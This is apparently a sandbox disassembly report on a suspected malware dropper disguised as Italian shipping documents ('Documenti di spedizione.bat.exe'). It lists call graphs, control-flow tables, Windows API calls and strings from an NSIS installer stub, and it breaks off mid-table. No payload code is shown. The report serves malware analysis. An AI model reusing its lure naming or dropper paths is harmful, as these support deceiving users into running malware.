5613->5603 5614->5592 5616 4042d2 SendMessageA 5617 4042f0 GetSysColor 5616->5617 5618 4042f9 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5616->5618 5617->5618 5618->5603 5619->5612 5620->5616 5621->5611 5629 401f2d 5630 402ace 18 API calls 5629->5630 5631 401f34 5630->5631 5632 4061fb 2 API calls 5631->5632 5633 401f3a 5632->5633 5635 401f4c 5633->5635 5636 405e55 wsprintfA 5633->5636 5636->5635 4489 401932 4490 401934 4489->4490 4491 402ace 18 API calls 4490->4491 4492 401939 4491->4492 4495 405799 4492->4495 4532 405a57 4495->4532 4498 4057c1 DeleteFileA 4504 401942 4498->4504 4499 4057d8 4511 405906 4499->4511 4546 405ef7 lstrcpynA 4499->4546 4501 4057fe 4502 405811 4501->4502 4503 405804 lstrcatA 4501->4503 4547 4059b0 lstrlenA 4502->4547 4505 405817 4503->4505 4508 405825 lstrcatA 4505->4508 4510 405830 lstrlenA FindFirstFileA 4505->4510 4507 4061fb 2 API calls 4509 40592a 4507->4509 4508->4510 4509->4504 4512 405969 3 API calls 4509->4512 4510->4511 4530 405854 4510->4530 4511->4504 4511->4507 4514 405934 4512->4514 4513 405994 CharNextA 4513->4530 4515 405751 5 API calls 4514->4515 4516 405940 4515->4516 4517 405944 4516->4517 4518 40595a 4516->4518 4517->4504 4522 405110 25 API calls 4517->4522 4520 405110 25 API calls 4518->4520 4520->4504 4521 4058e5 FindNextFileA 4523 4058fd FindClose 4521->4523 4521->4530 4524 405951 4522->4524 4523->4511 4525 405db2 38 API calls 4524->4525 4525->4504 4527 405799 62 API calls 4527->4530 4528 405110 25 API calls 4528->4521 4529 405110 25 API calls 4529->4530 4530->4513 4530->4521 4530->4527 4530->4528 4530->4529 4531 405db2 38 API calls 4530->4531 4551 405ef7 lstrcpynA 4530->4551 4552 405751 4530->4552 4531->4530 4560 405ef7 lstrcpynA 4532->4560 4534 405a68 4561 405a02 CharNextA CharNextA 4534->4561 4537 4057b9 4537->4498 4537->4499 4538 406162 5 API calls 4544 405a7e 4538->4544 4539 405aa9 lstrlenA 4540 405ab4 4539->4540 4539->4544 4542 405969 3 API calls 4540->4542 4541 4061fb 2 API calls 4541->4544 4543 405ab9 GetFileAttributesA 4542->4543 4543->4537 4544->4537 4544->4539 4544->4541 4545 4059b0 2 API calls 4544->4545 4545->4539 4546->4501 4548 4059bd 4547->4548 4549 4059c2 CharPrevA 4548->4549 4550 4059ce 4548->4550 4549->4548 4549->4550 4550->4505 4551->4530 4553 405b45 2 API calls 4552->4553 4555 40575d 4553->4555 4554 40577e 4554->4530 4555->4554 4556 405774 DeleteFileA 4555->4556 4557 40576c RemoveDirectoryA 4555->4557 4558 40577a 4556->4558 4557->4558 4558->4554 4559 40578a SetFileAttributesA 4558->4559 4559->4554 4560->4534 4562 405a1d 4561->4562 4565 405a2d 4561->4565 4564 405a28 CharNextA 4562->4564 4562->4565 4563 405a4d 4563->4537 4563->4538 4564->4563 4565->4563 4566 405994 CharNextA 4565->4566 4566->4565 4567 401eb3 4568 402ace 18 API calls 4567->4568 4569 401eb9 4568->4569 4570 405110 25 API calls 4569->4570 4571 401ec3 4570->4571 4582 405688 CreateProcessA 4571->4582 4573 401f1f CloseHandle 4577 402729 4573->4577 4574 401ee8 WaitForSingleObject 4575 401ec9 4574->4575 4576 401ef6 GetExitCodeProcess 4574->4576 4575->4573 4575->4574 4575->4577 4578 4062cc 2 API calls 4575->4578 4579 401f11 4576->4579 4580 401f08 4576->4580 4578->4574 4579->4573 4585 405e55 wsprintfA 4580->4585 4583 4056c7 4582->4583 4584 4056bb CloseHandle 4582->4584 4583->4575 4584->4583 4585->4579 5637 403835 5638 403840 5637->5638 5639 403847 GlobalAlloc 5638->5639 5640 403844 5638->5640 5639->5640 5641 406c35 5644 4063c6 5641->5644 5642 406450 GlobalAlloc 5642->5644 5645 406d31 5642->5645 5643 406447 GlobalFree 5643->5642 5644->5642 5644->5643 5644->5644 5644->5645 5646 4064c7 GlobalAlloc 5644->5646 5647 4064be GlobalFree 5644->5647 5646->5644 5646->5645 5647->5646 4596 402336 4597 402ace 18 API calls 4596->4597 4598 402347 4597->4598 4599 402ace 18 API calls 4598->4599 4600 402350 4599->4600 4601 402ace 18 API calls 4600->4601 4602 40235a GetPrivateProfileStringA 4601->4602 5648 4014b7 5649 4014bd 5648->5649 5650 401389 2 API calls 5649->5650 5651 4014c5 5650->5651 5652 401b39 5653 402ace 18 API calls 5652->5653 5654 401b40 5653->5654 5655 402aac 18 API calls 5654->5655 5656 401b49 wsprintfA 5655->5656 5657 40295e 5656->5657 5658 402939 SendMessageA 5659 402953 InvalidateRect 5658->5659 5660 40295e 5658->5660 5659->5660 4635 4015bb 4636 402ace 18 API calls 4635->4636 4637 4015c2 4636->4637 4638 405a02 4 API calls 4637->4638 4648 4015ca 4638->4648 4639 401624 4641 401652 4639->4641 4642 401629 4639->4642 4640 405994 CharNextA 4640->4648 4645 401423 25 API calls 4641->4645 4643 401423 25 API calls 4642->4643 4644 401630 4643->4644 4662 405ef7 lstrcpynA 4644->4662 4652 40164a 4645->4652 4648->4639 4648->4640 4651 40160c GetFileAttributesA 4648->4651 4654 405670 4648->4654 4657 4055d6 CreateDirectoryA 4648->4657 4663 405653 CreateDirectoryA 4648->4663 4650 40163b SetCurrentDirectoryA 4650->4652 4651->4648 4655 406290 5 API calls 4654->4655 4656 405677 4655->4656 4656->4648 4658 405623 4657->4658 4659 405627 GetLastError 4657->4659 4658->4648 4659->4658 4660 405636 SetFileSecurityA 4659->4660 4660->4658 4661 40564c GetLastError 4660->4661 4661->4658 4662->4650 4664 405663 4663->4664 4665 405667 GetLastError 4663->4665 4664->4648 4665->4664 5661 4016bb 5662 402ace 18 API calls 5661->5662 5663 4016c1 GetFullPathNameA 5662->5663 5666 4016d8 5663->5666 5670 4016f9 5663->5670 5664 40170d GetShortPathNameA 5665 40295e 5664->5665 5667 4061fb 2 API calls 5666->5667 5666->5670 5668 4016e9 5667->5668 5668->5670 5671 405ef7 lstrcpynA 5668->5671 5670->5664 5670->5665 5671->5670 5672 401d3b GetDlgItem GetClientRect 5673 402ace 18 API calls 5672->5673 5674 401d6b LoadImageA SendMessageA 5673->5674 5675 401d89 DeleteObject 5674->5675 5676 40295e 5674->5676 5675->5676 4844 4032bf SetErrorMode GetVersion 4845 4032f6 4844->4845 4846 4032fc 4844->4846 4847 406290 5 API calls 4845->4847 4848 406222 3 API calls 4846->4848 4847->4846 4849 403312 lstrlenA 4848->4849 4849->4846 4850 403321 4849->4850 4851 406290 5 API calls 4850->4851 4852 403329 4851->4852 4853 406290 5 API calls 4852->4853 4854 403330 #17 OleInitialize SHGetFileInfoA 4853->4854 4932 405ef7 lstrcpynA 4854->4932 4856 40336d GetCommandLineA 4933 405ef7 lstrcpynA 4856->4933 4858 40337f GetModuleHandleA 4859 403396 4858->4859 4860 405994 CharNextA 4859->4860 4861 4033aa CharNextA 4860->4861 4870 4033ba 4861->4870 4862 403484 4863 403497 GetTempPathA 4862->4863 4934 40328e 4863->4934 4865 4034af 4867 4034b3 GetWindowsDirectoryA lstrcatA 4865->4867 4868 403509 DeleteFileA 4865->4868 4866 405994 CharNextA 4866->4870 4871 40328e 12 API calls 4867->4871 4944 402d4a GetTickCount GetModuleFileNameA 4868->4944 4870->4862 4870->4866 4873 403486 4870->4873 4872 4034cf 4871->4872 4872->4868 4875 4034d3 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4872->4875 5030 405ef7 lstrcpynA 4873->5030 4874 40351d 4876 4035b3 4874->4876 4879 4035a3 4874->4879 4883 405994 CharNextA 4874->4883 4878 40328e 12 API calls 4875->4878 5033 403785 4876->5033 4881 403501 4878->4881 4974 403877 4879->4974 4881->4868 4881->4876 4885 403538 4883->4885 4894 4035e3 4885->4894 4895 40357e 4885->4895 4886 4036eb 4888 4036f3 GetCurrentProcess OpenProcessToken 4886->4888 4889 40376d ExitProcess 4886->4889 4887 4035cd 4890 4056ed MessageBoxIndirectA 4887->4890 4891 40373e 4888->4891 4892 40370e LookupPrivilegeValueA AdjustTokenPrivileges 4888->4892 4896 4035db ExitProcess 4890->4896 4899 406290 5 API calls 4891->4899 4892->4891 4898 405670 5 API calls 4894->4898 4897 405a57 18 API calls 4895->4897 4900 403589 4897->4900 4901 4035e8 lstrcatA 4898->4901 4902 403745 4899->4902 4900->4876 5031 405ef7 lstrcpynA 4900->5031 4903 403604 lstrcatA lstrcmpiA 4901->4903 4904 4035f9 lstrcatA 4901->4904 4905 40375a ExitWindowsEx 4902->4905 4908 403766 4902->4908 4903->4876 4907 403620 4903->4907 4904->4903 4905->4889 4905->4908 4910 403625 4907->4910 4911 40362c 4907->4911 4912 40140b 2 API calls 4908->4912 4909 403598 5032 405ef7 lstrcpynA 4909->5032 4914 4055d6 4 API calls 4910->4914 4915 405653 2 API calls 4911->4915 4912->4889 4916 40362a 4914->4916 4917 403631 SetCurrentDirectoryA 4915->4917 4916->4917 4918 403640 4917->4918 4919 40364b 4917->4919 5042 405ef7 lstrcpynA 4918->5042 5043 405ef7 lstrcpynA 4919->5043 4922 405f19 18 API calls 4923 40368a DeleteFileA 4922->4923 4924 403697 CopyFileA 4923->4924 4929 403659 4923->4929 4924->4929 4925 4036df 4927 405db2 38 API calls 4925->4927 4926 405db2 38 API calls 4926->4929 4927->4876 4928 405f19 18 API calls 4928->4929 4929->4922 4929->4925 4929->4926 4929->4928 4930 405688 2 API calls 4929->4930 4931 4036cb CloseHandle 4929->4931 4930->4929 4931->4929 4932->4856 4933->4858 4935 406162 5 API calls 4934->4935 4937 40329a 4935->4937 4936 4032a4 4936->4865 4937->4936 4938 405969 3 API calls 4937->4938 4939 4032ac 4938->4939 4940 405653 2 API calls 4939->4940 4941 4032b2 4940->4941 4942 405b99 2 API calls 4941->4942 4943 4032bd 4942->4943 4943->4865 5044 405b6a GetFileAttributesA CreateFileA 4944->5044 4946 402d8d 4973 402d9a 4946->4973 5045 405ef7 lstrcpynA 4946->5045 4948 402db0 4949 4059b0 2 API calls 4948->4949 4950 402db6 4949->4950 5046 405ef7 lstrcpynA 4950->5046 4952 402dc1 GetFileSize 4953 402ec2 4952->4953 4971 402dd8 4952->4971 4954 402cab 33 API calls 4953->4954 4955 402ec9 4954->4955 4957 402f05 GlobalAlloc 4955->4957 4955->4973 5048 403277 SetFilePointer 4955->5048 4956 403261 ReadFile 4956->4971 4961 402f1c 4957->4961 4958 402f5d 4959 402cab 33 API calls 4958->4959 4959->4973 4965 405b99 2 API calls 4961->4965 4962 402ee6 4963 403261 ReadFile 4962->4963 4966 402ef1 4963->4966 4964 402cab 33 API calls 4964->4971 4967 402f2d CreateFileA 4965->4967 4966->4957 4966->4973 4968 402f67 4967->4968 4967->4973 5047 403277 SetFilePointer 4968->5047 4970 402f75 4972 402ff0 45 API calls 4970->4972 4971->4953 4971->4956 4971->4958 4971->4964 4971->4973 4972->4973 4973->4874 4975 406290 5 API calls 4974->4975 4976 40388b 4975->4976 4977 403891 4976->4977 4978 4038a3 4976->4978 5058 405e55 wsprintfA 4977->5058 4979 405dde 3 API calls 4978->4979 4980 4038ce 4979->4980 4982 4038ec lstrcatA 4980->4982 4984 405dde 3 API calls 4980->4984 4983 4038a1 4982->4983 5049 403b3c 4983->5049 4984->4982 4987 405a57 18 API calls 4988 40391e 4987->4988 4989 4039a7 4988->4989 4991 405dde 3 API calls 4988->4991 4990 405a57 18 API calls 4989->4990 4992 4039ad 4990->4992 4993 40394a 4991->4993 4994 4039bd LoadImageA 4992->4994 4995 405f19 18 API calls 4992->4995 4993->4989 4999 403966 lstrlenA 4993->4999 5003 405994 CharNextA 4993->5003 4996 403a63 4994->4996 4997 4039e4 RegisterClassA 4994->4997 4995->4994 4998 40140b 2 API calls 4996->4998 5000 403a6d 4997->5000 5001 403a1a SystemParametersInfoA CreateWindowExA 4997->5001 5002 403a69 4998->5002 5004 403974 lstrcmpiA 4999->5004 5005 40399a 4999->5005 5000->4876 5001->4996 5002->5000 5010 403b3c 19 API calls 5002->5010 5008 403964 5003->5008 5004->5005 5006 403984 GetFileAttributesA 5004->5006 5007 405969 3 API calls 5005->5007 5009 403990 5006->5009 5011 4039a0 5007->5011 5008->4999 5009->5005 5012 4059b0 2 API calls 5009->5012 5013 403a7a 5010->5013 5059 405ef7 lstrcpynA 5011->5059 5012->5005 5015 403a86 ShowWindow 5013->5015 5016 403b09 5013->5016 5018 406222 3 API calls 5015->5018 5017 4051e2 5 API calls 5016->5017 5019 403b0f 5017->5019 5020 403a9e 5018->5020 5021 403b13 5019->5021 5022 403b2b 5019->5022 5023 403aac GetClassInfoA 5020->5023 5025 406222 3 API calls 5020->5025 5021->5000 5028 40140b 2 API calls 5021->5028 5024 40140b 2 API calls 5022->5024 5026 403ac0 GetClassInfoA RegisterClassA 5023->5026 5027 403ad6 DialogBoxParamA 5023->5027 5024->5000 5025->5023 5026->5027 5029 40140b 2 API calls 5027->5029 5028->5000 5029->5000 5030->4863 5031->4909 5032->4879 5034 4037a0 5033->5034 5035 403796 CloseHandle 5033->5035 5036 4037b4 5034->5036 5037 4037aa CloseHandle 5034->5037 5035->5034 5061 4037e2 5036->5061 5037->5036 5040 405799 69 API calls 5041 4035bc OleUninitialize 5040->5041 5041->4886 5041->4887 5042->4919 5043->4929 5044->4946 5045->4948 5046->4952 5047->4970 5048->4962 5050 403b50 5049->5050 5060 405e55 wsprintfA 5050->5060 5052 403bc1 5053 405f19 18 API calls 5052->5053 5054 403bcd SetWindowTextA 5053->5054 5055 4038fc 5054->5055 5056 403be9 5054->5056 5055->4987 5056->5055 5057 405f19 18 API calls 5056->5057 5057->5056 5058->4983 5059->4989 5060->5052 5062 4037f0 5061->5062 5063 4037b9 5062->5063 5064 4037f5 FreeLibrary GlobalFree 5062->5064 5063->5040 5064->5063 5064->5064

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 4032bf-4032f4 SetErrorMode GetVersion 1 4032f6-4032fe call 406290 0->1 2 403307 0->2 1->2 7 403300 1->7 4 40330c-40331f call 406222 lstrlenA 2->4 9 403321-403394 call 406290 * 2 #17 OleInitialize SHGetFileInfoA call 405ef7 GetCommandLineA call 405ef7 GetModuleHandleA 4->9 7->2 18 4033a0-4033b5 call 405994 CharNextA 9->18 19 403396-40339b 9->19 22 40347a-40347e 18->22 19->18 23 403484 22->23 24 4033ba-4033bd 22->24 27 403497-4034b1 GetTempPathA call 40328e 23->27 25 4033c5-4033cd 24->25 26 4033bf-4033c3 24->26 28 4033d5-4033d8 25->28 29 4033cf-4033d0 25->29 26->25 26->26 37 4034b3-4034d1 GetWindowsDirectoryA lstrcatA call 40328e 27->37 38 403509-403523 DeleteFileA call 402d4a 27->38 31 40346a-403477 call 405994 28->31 32 4033de-4033e2 28->32 29->28 31->22 50 403479 31->50 35 4033e4-4033ea 32->35 36 4033fa-403427 32->36 41 4033f0 35->41 42 4033ec-4033ee 35->42 43 403429-40342f 36->43 44 40343a-403468 36->44 37->38 52 4034d3-403503 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 40328e 37->52 53 4035b7-4035c7 call 403785 OleUninitialize 38->53 54 403529-40352f 38->54 41->36 42->36 42->41 46 403431-403433 43->46 47 403435 43->47 44->31 49 403486-403492 call 405ef7 44->49 46->44 46->47 47->44 49->27 50->22 52->38 52->53 66 4036eb-4036f1 53->66 67 4035cd-4035dd call 4056ed ExitProcess 53->67 57 403531-40353c call 405994 54->57 58 4035a7-4035ae call 403877 54->58 70 403572-40357c 57->70 71 40353e-403567 57->71 64 4035b3 58->64 64->53 68 4036f3-40370c GetCurrentProcess OpenProcessToken 66->68 69 40376d-403775 66->69 73 40373e-40374c call 406290 68->73 74 40370e-403738 LookupPrivilegeValueA AdjustTokenPrivileges 68->74 76 403777 69->76 77 40377b-40377f ExitProcess 69->77 78 4035e3-4035f7 call 405670 lstrcatA 70->78 79 40357e-40358b call 405a57 70->79 75 403569-40356b 71->75 91 40375a-403764 ExitWindowsEx 73->91 92 40374e-403758 73->92 74->73 75->70 84 40356d-403570 75->84 76->77 89 403604-40361e lstrcatA lstrcmpiA 78->89 90 4035f9-4035ff lstrcatA 78->90 79->53 88 40358d-4035a3 call 405ef7 * 2 79->88 84->70 84->75 88->58 89->53 94 403620-403623 89->94 90->89 91->69 95 403766-403768 call 40140b 91->95 92->91 92->95 97 403625-40362a call 4055d6 94->97 98 40362c call 405653 94->98 95->69 106 403631-40363e SetCurrentDirectoryA 97->106 98->106 107 403640-403646 call 405ef7 106->107 108 40364b-403673 call 405ef7 106->108 107->108 112 403679-403695 call 405f19 DeleteFileA 108->112 115 4036d6-4036dd 112->115 116 403697-4036a7 CopyFileA 112->116 115->112 118 4036df-4036e6 call 405db2 115->118 116->115 117 4036a9-4036c9 call 405db2 call 405f19 call 405688 116->117 117->115 127 4036cb-4036d2 CloseHandle 117->127 118->53 127->115
                                            APIs
                                            • SetErrorMode.KERNELBASE ref: 004032E4
                                            • GetVersion.KERNEL32 ref: 004032EA
                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403313
                                            • #17.COMCTL32(00000007,00000009), ref: 00403335
                                            • OleInitialize.OLE32(00000000), ref: 0040333C
                                            • SHGetFileInfoA.SHELL32(0041ECF0,00000000,?,00000160,00000000), ref: 00403358
                                            • GetCommandLineA.KERNEL32(00422F20,NSIS Error), ref: 0040336D
                                            • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Documenti di spedizione.bat.exe",00000000), ref: 00403380
                                            • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Documenti di spedizione.bat.exe",00000020), ref: 004033AB
                                            • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004034A8
                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034B9
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034C5
                                            • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034D9
                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034E1
                                            • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004034F2
                                            • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004034FA
                                            • DeleteFileA.KERNELBASE(1033), ref: 0040350E
                                              • Part of subcall function 00406290: GetModuleHandleA.KERNEL32(?,?,?,00403329,00000009), ref: 004062A2
                                              • Part of subcall function 00406290: GetProcAddress.KERNEL32(00000000,?), ref: 004062BD
                                            • OleUninitialize.OLE32(?), ref: 004035BC
                                            • ExitProcess.KERNEL32 ref: 004035DD
                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 004036FA
                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403701
                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403719
                                            • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403738
                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 0040375C
                                            • ExitProcess.KERNEL32 ref: 0040377F
                                              • Part of subcall function 004056ED: MessageBoxIndirectA.USER32(00409230), ref: 00405748
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                            • String ID: "$"C:\Users\user\Desktop\Documenti di spedizione.bat.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Subarachnoid$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Documenti di spedizione.bat.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                            • API String ID: 3329125770-870891048
                                            • Opcode ID: e89bfe13b8eb1ba36e43d38e3c68fc4bfbdc91619f963e3beaaf1f3555cbe72f
                                            • Instruction ID: 987bc29005933e48b9d04248005189ae3273ffe916fb5a61461eda946c2e522c
                                            • Opcode Fuzzy Hash: e89bfe13b8eb1ba36e43d38e3c68fc4bfbdc91619f963e3beaaf1f3555cbe72f
                                            • Instruction Fuzzy Hash: FCC109706082816AE7216F259D49A2F3EACEF81706F44447FF481761E2CB7C9A05CB6E

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 128 40524e-40526a 129 405270-405337 GetDlgItem * 3 call 404111 call 4049ae GetClientRect GetSystemMetrics SendMessageA * 2 128->129 130 4053f9-4053ff 128->130 150 405355-405358 129->150 151 405339-405353 SendMessageA * 2 129->151 132 405401-405423 GetDlgItem CreateThread CloseHandle 130->132 133 405429-405435 130->133 132->133 135 405457-40545d 133->135 136 405437-40543d 133->136 140 4054b2-4054b5 135->140 141 40545f-405465 135->141 138 405478-40547f call 404143 136->138 139 40543f-405452 ShowWindow * 2 call 404111 136->139 154 405484-405488 138->154 139->135 140->138 143 4054b7-4054bd 140->143 145 405467-405473 call 4040b5 141->145 146 40548b-40549b ShowWindow 141->146 143->138 152 4054bf-4054d2 SendMessageA 143->152 145->138 148 4054ab-4054ad call 4040b5 146->148 149 40549d-4054a6 call 405110 146->149 148->140 149->148 157 405368-40537f call 4040dc 150->157 158 40535a-405366 SendMessageA 150->158 151->150 159 4054d8-405504 CreatePopupMenu call 405f19 AppendMenuA 152->159 160 4055cf-4055d1 152->160 167 405381-405395 ShowWindow 157->167 168 4053b5-4053d6 GetDlgItem SendMessageA 157->168 158->157 165 405506-405516 GetWindowRect 159->165 166 405519-40552f TrackPopupMenu 159->166 160->154 165->166 166->160 170 405535-40554f 166->170 171 4053a4 167->171 172 405397-4053a2 ShowWindow 167->172 168->160 169 4053dc-4053f4 SendMessageA * 2 168->169 169->160 173 405554-40556f SendMessageA 170->173 174 4053aa-4053b0 call 404111 171->174 172->174 173->173 175 405571-405591 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 173->175 174->168 177 405593-4055b3 SendMessageA 175->177 177->177 178 4055b5-4055c9 GlobalUnlock SetClipboardData CloseClipboard 177->178 178->160
                                            APIs
                                            • GetDlgItem.USER32(?,00000403), ref: 004052AD
                                            • GetDlgItem.USER32(?,000003EE), ref: 004052BC
                                            • GetClientRect.USER32(?,?), ref: 004052F9
                                            • GetSystemMetrics.USER32(00000002), ref: 00405300
                                            • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405321
                                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405332
                                            • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405345
                                            • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405353
                                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405366
                                            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405388
                                            • ShowWindow.USER32(?,00000008), ref: 0040539C
                                            • GetDlgItem.USER32(?,000003EC), ref: 004053BD
                                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004053CD
                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004053E6
                                            • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053F2
                                            • GetDlgItem.USER32(?,000003F8), ref: 004052CB
                                              • Part of subcall function 00404111: SendMessageA.USER32(00000028,?,00000001,00403F42), ref: 0040411F
                                            • GetDlgItem.USER32(?,000003EC), ref: 0040540E
                                            • CreateThread.KERNELBASE(00000000,00000000,Function_000051E2,00000000), ref: 0040541C
                                            • CloseHandle.KERNELBASE(00000000), ref: 00405423
                                            • ShowWindow.USER32(00000000), ref: 00405446
                                            • ShowWindow.USER32(?,00000008), ref: 0040544D
                                            • ShowWindow.USER32(00000008), ref: 00405493
                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004054C7
                                            • CreatePopupMenu.USER32 ref: 004054D8
                                            • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004054ED
                                            • GetWindowRect.USER32(?,000000FF), ref: 0040550D
                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405526
                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405562
                                            • OpenClipboard.USER32(00000000), ref: 00405572
                                            • EmptyClipboard.USER32 ref: 00405578
                                            • GlobalAlloc.KERNEL32(00000042,?), ref: 00405581
                                            • GlobalLock.KERNEL32(00000000), ref: 0040558B
                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040559F
                                            • GlobalUnlock.KERNEL32(00000000), ref: 004055B8
                                            • SetClipboardData.USER32(00000001,00000000), ref: 004055C3
                                            • CloseClipboard.USER32 ref: 004055C9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                            • String ID: Gazi Setup: Installing$dK
                                            • API String ID: 590372296-1064461354
                                            • Opcode ID: bd05f583e1d858ca64e0ebc0ccb0213cdf64d916f2755f86f6f3f2ff8d205a57
                                            • Instruction ID: e0dc4773203ce2f112709eab9a11bfc184f4d069c8d5349c47d5b80479340f4b
                                            • Opcode Fuzzy Hash: bd05f583e1d858ca64e0ebc0ccb0213cdf64d916f2755f86f6f3f2ff8d205a57
                                            • Instruction Fuzzy Hash: 10A148B1900208BFDF119F60DD89AAE7BB9FB48355F00407AFA01B61A0C7B55E51DF69

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 427 405f19-405f24 428 405f26-405f35 427->428 429 405f37-405f4c 427->429 428->429 430 405f52-405f5d 429->430 431 40613f-406143 429->431 430->431 432 405f63-405f6a 430->432 433 406149-406153 431->433 434 405f6f-405f79 431->434 432->431 436 406155-406159 call 405ef7 433->436 437 40615e-40615f 433->437 434->433 435 405f7f-405f86 434->435 438 406132 435->438 439 405f8c-405fc1 435->439 436->437 441 406134-40613a 438->441 442 40613c-40613e 438->442 443 405fc7-405fd2 GetVersion 439->443 444 4060dc-4060df 439->444 441->431 442->431 445 405fd4-405fd8 443->445 446 405fec 443->446 447 4060e1-4060e4 444->447 448 40610f-406112 444->448 445->446 451 405fda-405fde 445->451 454 405ff3-405ffa 446->454 452 4060f4-406100 call 405ef7 447->452 453 4060e6-4060f2 call 405e55 447->453 449 406120-406130 lstrlenA 448->449 450 406114-40611b call 405f19 448->450 449->431 450->449 451->446 456 405fe0-405fe4 451->456 465 406105-40610b 452->465 453->465 458 405ffc-405ffe 454->458 459 405fff-406001 454->459 456->446 461 405fe6-405fea 456->461 458->459 463 406003-40601e call 405dde 459->463 464 40603a-40603d 459->464 461->454 470 406023-406026 463->470 468 40604d-406050 464->468 469 40603f-40604b GetSystemDirectoryA 464->469 465->449 467 40610d 465->467 471 4060d4-4060da call 406162 467->471 473 406052-406060 GetWindowsDirectoryA 468->473 474 4060ba-4060bc 468->474 472 4060be-4060c1 469->472 475 4060c3-4060c7 470->475 476 